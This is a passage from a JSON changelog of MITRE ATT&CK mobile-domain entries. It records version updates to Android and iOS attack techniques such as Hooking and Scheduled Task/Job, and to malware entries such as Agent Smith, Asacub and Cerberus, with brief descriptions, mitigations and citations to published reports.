By being able to add arbitrary bytes to valid applications, attackers can seamlessly inject code into genuine executables without the user's knowledge.(Citation: Guardsquare Janus)\n\nAdversaries may also rebuild applications to include malicious modifications. This can be achieved by decompiling the genuine application, merging it with the malicious code, and recompiling it.(Citation: CheckPoint Agent Smith)\n\nAdversaries may also take action to conceal modifications to application executables and bypass user consent. These actions include altering modifications to appear as an update or exploiting vulnerabilities that allow activities of the malicious application to run inside a system application.(Citation: CheckPoint Agent Smith)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1577", + "external_id": "T1577" + }, + { + "source_name": "Guardsquare Janus", + "description": "Guarsquare. (2017, November 13). New Android vulnerability allows attackers to modify apps without affecting their signatures. Retrieved May 7, 2020.", + "url": "https://www.guardsquare.com/en/blog/new-android-vulnerability-allows-attackers-modify-apps-without-affecting-their-signatures" + }, + { + "source_name": "CheckPoint Agent Smith", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. 
Retrieved May 7, 2020.", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "This behavior is seamless to the user and is typically undetectable.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:40.355000+00:00\", \"old_value\": \"2025-04-16 21:21:56.351000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M1001: Security Updates", + "M1006: Use Recent OS Version" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--ccde43e4-78f9-4f32-b401-c081e7db71ea", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-24 14:47:34.182000+00:00", + "modified": "2025-04-25 15:16:39.824000+00:00", + "name": "Hooking", + "description": "Adversaries may utilize hooking to hide the presence of artifacts associated with their behaviors to evade detection. Hooking can be used to modify return values or data structures of system APIs and function calls. This process typically involves using 3rd party root frameworks, such as Xposed or Magisk, with either a system exploit or pre-existing root access. 
By including custom modules for root frameworks, adversaries can hook system APIs and alter the return value and/or system data structures to alter functionality/visibility of various aspects of the system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1617", + "external_id": "T1617" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "J\u00f6rg Abraham, EclecticIQ" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Hooking can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:39.824000+00:00\", \"old_value\": \"2025-04-16 21:21:55.543000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [ + "M1002: Attestation", + "M1010: Deploy Compromised Device Detection Method" + ], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [], + "new": [], + "dropped": [] + } + }, + { + "type": "attack-pattern", + "id": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-11-04 16:43:31.619000+00:00", + "modified": "2025-04-25 15:16:26.617000+00:00", + "name": "Scheduled 
Task/Job", + "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.\n\nOn Android, the `WorkManager` API allows asynchronous tasks to be scheduled with the system. `WorkManager` was introduced to unify task scheduling on Android, using `JobScheduler`, `GcmNetworkManager`, and `AlarmManager` internally. `WorkManager` offers a lot of flexibility for scheduling, including periodically, one time, or constraint-based (e.g. only when the device is charging).(Citation: Android WorkManager)\n\nOn iOS, the `NSBackgroundActivityScheduler` API allows asynchronous tasks to be scheduled with the system. The tasks can be scheduled to be repeating or non-repeating, however, the system chooses when the tasks will be executed. The app can choose the interval for repeating tasks, or the delay between scheduling and execution for one-time tasks.(Citation: Apple NSBackgroundActivityScheduler)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1603", + "external_id": "T1603" + }, + { + "source_name": "Android WorkManager", + "description": "Google. (n.d.). Schedule tasks with WorkManager. Retrieved November 4, 2020.", + "url": "https://developer.android.com/topic/libraries/architecture/workmanager" + }, + { + "source_name": "Apple NSBackgroundActivityScheduler", + "description": "Apple. (n.d.). NSBackgroundActivityScheduler. 
Retrieved November 4, 2020.", + "url": "https://developer.apple.com/documentation/foundation/nsbackgroundactivityscheduler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Lorin Wu, Trend Micro" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 15:16:26.617000+00:00\", \"old_value\": \"2025-04-16 21:21:43.650000+00:00\"}}}", + "previous_version": "1.0", + "changelog_mitigations": { + "shared": [], + "new": [], + "dropped": [] + }, + "changelog_detections": { + "shared": [], + "new": [], + "dropped": [] + } + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "software": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "malware", + "id": "malware--4bf6ba32-4165-42c1-b911-9c36165891c8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:47.965000+00:00", + "modified": "2025-04-25 14:40:25.685000+00:00", + "name": "ANDROIDOS_ANSERVER.A", + "description": "[ANDROIDOS_ANSERVER.A](https://attack.mitre.org/software/S0310) is Android malware that is unique because it uses encrypted content within a blog site for command and control. 
(Citation: TrendMicro-Anserver)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0310", + "external_id": "S0310" + }, + { + "source_name": "ANDROIDOS_ANSERVER.A", + "description": "(Citation: TrendMicro-Anserver)" + }, + { + "source_name": "TrendMicro-Anserver", + "description": "Karl Dominguez. (2011, October 2). Android Malware Uses Blog Posts as C&C. Retrieved February 6, 2017.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/android-malware-uses-blog-posts-as-cc/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "ANDROIDOS_ANSERVER.A" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.3", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:25.685000+00:00\", \"old_value\": \"2025-04-16 21:22:08.276000+00:00\"}}}", + "previous_version": "1.3" + }, + { + "type": "malware", + "id": "malware--f6ac21b6-2592-400c-8472-10d0e2f1bfaf", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:47.038000+00:00", + "modified": "2025-04-25 14:40:45.642000+00:00", + "name": "Adups", + "description": "[Adups](https://attack.mitre.org/software/S0309) is software that was pre-installed onto Android devices, including those made by BLU Products. The software was reportedly designed to help a Chinese phone manufacturer monitor user behavior, transferring sensitive data to a Chinese server. 
(Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0309", + "external_id": "S0309" + }, + { + "source_name": "Adups", + "description": "(Citation: NYTimes-BackDoor) (Citation: BankInfoSecurity-BackDoor)" + }, + { + "source_name": "NYTimes-BackDoor", + "description": "Matt Apuzzo and Michael S. Schmidt. (2016, November 15). Secret Back Door in Some U.S. Phones Sent Data to China, Analysts Say. Retrieved February 6, 2017.", + "url": "https://www.nytimes.com/2016/11/16/us/politics/china-phones-software-security.html" + }, + { + "source_name": "BankInfoSecurity-BackDoor", + "description": "Jeremy Kirk. (2016, November 16). Why Did Chinese Spyware Linger in U.S. Phones?. Retrieved February 6, 2017.", + "url": "http://www.bankinfosecurity.com/did-chinese-spyware-linger-in-us-phones-a-9534" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:45.642000+00:00\", \"old_value\": \"2025-04-16 21:22:15.993000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--a6228601-03f6-4949-ae22-c1087627a637", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-07 15:18:34.417000+00:00", + "modified": "2025-04-25 14:40:35.302000+00:00", + "name": "Agent Smith", + "description": "[Agent Smith](https://attack.mitre.org/software/S0440) is mobile malware that generates financial gain by replacing legitimate 
applications on devices with malicious versions that include fraudulent ads. As of July 2019 [Agent Smith](https://attack.mitre.org/software/S0440) had infected around 25 million devices, primarily targeting India though effects had been observed in other Asian countries as well as Saudi Arabia, the United Kingdom, and the United States.(Citation: CheckPoint Agent Smith)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0440", + "external_id": "S0440" + }, + { + "source_name": "CheckPoint Agent Smith", + "description": "A. Hazum, F. He, I. Marom, B. Melnykov, A. Polkovnichenko. (2019, July 10). Agent Smith: A New Species of Mobile Malware. Retrieved May 7, 2020.", + "url": "https://research.checkpoint.com/2019/agent-smith-a-new-species-of-mobile-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Agent Smith" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:35.302000+00:00\", \"old_value\": \"2025-04-16 21:22:11.884000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--24c8f6db-71e0-41ef-a1dc-83399a5b17e5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2023-12-18 19:00:02.259000+00:00", + "modified": "2025-04-22 21:22:24.938000+00:00", + "name": "AhRat", + "description": 
"[AhRat](https://attack.mitre.org/software/S1095) is an Android remote access tool based on the open-source AhMyth remote access tool. [AhRat](https://attack.mitre.org/software/S1095) initially spread in August 2022 on the Google Play Store via an update containing malicious code to the previously benign application, \u201ciRecorder \u2013 Screen Recorder,\u201d which itself was released in September 2021.(Citation: welivesecurity_ahrat_0523)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1095", + "external_id": "S1095" + }, + { + "source_name": "welivesecurity_ahrat_0523", + "description": "Lukas Stefanko. (2023, May 23). Android app breaking bad: From legitimate screen recording to file exfiltration within a year. Retrieved December 18, 2023.", + "url": "https://www.welivesecurity.com/2023/05/23/android-app-breaking-bad-legitimate-screen-recording-file-exfiltration/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "AhRat" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Edward Stevens, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 21:22:24.938000+00:00\", \"old_value\": \"2025-01-24 17:12:44.782000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Edward Stevens, BT Security\", \"old_value\": \"Edward Stevens\"}}, \"iterable_item_removed\": {\"root['x_mitre_contributors'][1]\": \"BT Security\"}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--08784a9d-09e9-4dce-a839-9612398214e8", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:14.772000+00:00", + "name": "Allwinner", + "description": "[Allwinner](https://attack.mitre.org/software/S0319) is a company that supplies processors used in Android tablets and other devices. A Linux kernel distributed by [Allwinner](https://attack.mitre.org/software/S0319) for use on these devices reportedly contained a backdoor. (Citation: HackerNews-Allwinner)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0319", + "external_id": "S0319" + }, + { + "source_name": "Allwinner", + "description": "(Citation: HackerNews-Allwinner)" + }, + { + "source_name": "HackerNews-Allwinner", + "description": "Mohit Kumar. (2016, May 11). Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Maker. Retrieved September 18, 2018.", + "url": "https://thehackernews.com/2016/05/android-kernal-exploit.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:14.772000+00:00\", \"old_value\": \"2025-04-16 21:22:03.823000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-29 19:19:08.848000+00:00", + "modified": "2025-04-25 14:40:46.381000+00:00", + "name": "Android/AdDisplay.Ashas", + "description": 
"[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) is a variant of adware that has been distributed through multiple apps in the Google Play Store. (Citation: WeLiveSecurity AdDisplayAshas)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0525", + "external_id": "S0525" + }, + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020.", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Android/AdDisplay.Ashas" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:46.381000+00:00\", \"old_value\": \"2025-04-16 21:22:16.304000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:45.482000+00:00", + "modified": "2025-04-25 14:40:40.920000+00:00", + "name": "Android/Chuli.A", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) is Android malware that was delivered to activist groups via a spearphishing email with an attachment. 
(Citation: Kaspersky-WUC)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0304", + "external_id": "S0304" + }, + { + "source_name": "Android/Chuli.A", + "description": "(Citation: Kaspersky-WUC)" + }, + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Android/Chuli.A" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:40.920000+00:00\", \"old_value\": \"2025-04-16 21:22:14.103000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-29 18:41:49.272000+00:00", + "modified": "2025-04-25 14:40:32.960000+00:00", + "name": "AndroidOS/MalLocker.B", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) is a variant of a ransomware family targeting Android devices. It prevents the user from interacting with the UI by displaying a screen containing a ransom note over all other windows. 
(Citation: Microsoft MalLockerB)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0524", + "external_id": "S0524" + }, + { + "source_name": "Microsoft MalLockerB", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "AndroidOS/MalLocker.B" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:32.960000+00:00\", \"old_value\": \"2025-04-16 21:22:11.027000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-14 15:02:35.007000+00:00", + "modified": "2025-04-25 14:40:35.670000+00:00", + "name": "Asacub", + "description": "[Asacub](https://attack.mitre.org/software/S0540) is a banking trojan that attempts to steal money from victims\u2019 bank accounts. 
It attempts to do this by initiating a wire transfer via SMS message from compromised devices.(Citation: Securelist Asacub)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0540", + "external_id": "S0540" + }, + { + "source_name": "Trojan-SMS.AndroidOS.Smaps", + "description": "(Citation: Securelist Asacub)" + }, + { + "source_name": "Securelist Asacub", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020.", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Asacub", + "Trojan-SMS.AndroidOS.Smaps" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:35.670000+00:00\", \"old_value\": \"2025-04-16 21:22:12.041000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-31 18:25:04.779000+00:00", + "modified": "2025-04-25 14:40:33.676000+00:00", + "name": "CHEMISTGAMES", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) is a modular backdoor that has been deployed by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CYBERWARCON CHEMISTGAMES)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": 
"https://attack.mitre.org/software/S0555", + "external_id": "S0555" + }, + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020.", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CHEMISTGAMES" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:33.676000+00:00\", \"old_value\": \"2025-04-16 21:22:11.340000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-11-10 16:50:38.917000+00:00", + "modified": "2025-04-25 14:40:13.122000+00:00", + "name": "CarbonSteal", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) is one of a family of four surveillanceware tools that share a common C2 infrastructure. [CarbonSteal](https://attack.mitre.org/software/S0529) primarily deals with audio surveillance. (Citation: Lookout Uyghur Campaign)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0529", + "external_id": "S0529" + }, + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). 
Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CarbonSteal" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:13.122000+00:00\", \"old_value\": \"2025-04-16 21:22:03.013000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-26 15:32:24.569000+00:00", + "modified": "2025-04-25 14:40:13.502000+00:00", + "name": "Cerberus", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) is a banking trojan whose usage can be rented on underground forums and marketplaces. Prior to being available to rent, the authors of [Cerberus](https://attack.mitre.org/software/S0480) claim was used in private operations for two years.(Citation: Threat Fabric Cerberus)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0480", + "external_id": "S0480" + }, + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. 
Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cerberus" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:13.502000+00:00\", \"old_value\": \"2025-04-16 21:22:03.157000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:39.631000+00:00", + "modified": "2025-04-25 14:40:41.299000+00:00", + "name": "Charger", + "description": "[Charger](https://attack.mitre.org/software/S0323) is Android malware that steals steals contacts and SMS messages from the user's device. It can also lock the device and demand ransom payment if it receives admin permissions. (Citation: CheckPoint-Charger)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": 